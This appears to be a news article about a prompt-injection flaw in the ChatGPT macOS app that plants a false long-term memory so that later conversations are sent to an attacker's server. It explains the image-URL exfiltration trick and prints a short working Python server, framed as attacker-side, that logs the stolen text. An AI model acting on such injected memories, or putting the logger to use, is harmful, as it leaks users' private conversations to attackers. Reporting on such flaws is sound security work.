
    Hacker creates false memories in ChatGPT to steal victim data — but it might not be as bad as it sounds



    Security researchers have exposed a vulnerability that could allow threat actors to store malicious instructions in a user’s memory settings in the ChatGPT macOS app.

    A report from Johann Rehberger at Embrace The Red noted how an attacker could trigger a prompt injection to take control of ChatGPT and then insert a memory into its long-term storage, a persistence mechanism that survives across chat sessions. This leads to both sides of the conversation being exfiltrated straight to the attacker’s server.
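    The report’s technical details are not reproduced here, but the general shape of this kind of exfiltration channel is well known: a poisoned memory can instruct the model to render an attacker-controlled image URL with the user’s text appended as a query parameter, so data leaks whenever the client fetches the “image.” As a minimal sketch of the receiving end, assuming a hypothetical attacker-run host and a query parameter named q (neither is taken from the report), a few lines of Python are enough to log whatever arrives:

        # Minimal sketch of an attacker-side logging endpoint (hypothetical
        # host and parameter name; illustration only, not code from the report).
        from http.server import BaseHTTPRequestHandler, HTTPServer
        from urllib.parse import parse_qs, urlparse

        class ExfilLogger(BaseHTTPRequestHandler):
            def do_GET(self):
                # Exfiltrated text arrives URL-encoded in the query string,
                # e.g. GET /log?q=<message> disguised as an image fetch.
                query = parse_qs(urlparse(self.path).query)
                for value in query.get("q", []):
                    print(f"captured: {value}")
                # Reply with an empty response; the "image" never renders,
                # but the data has already been delivered.
                self.send_response(204)
                self.end_headers()

        if __name__ == "__main__":
            HTTPServer(("0.0.0.0", 8000), ExfilLogger).serve_forever()

    Running this and requesting http://localhost:8000/log?q=hello prints “captured: hello”, which is the whole trick: once a persistent memory can make the model emit such URLs, every subsequent message becomes a beacon to the attacker.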
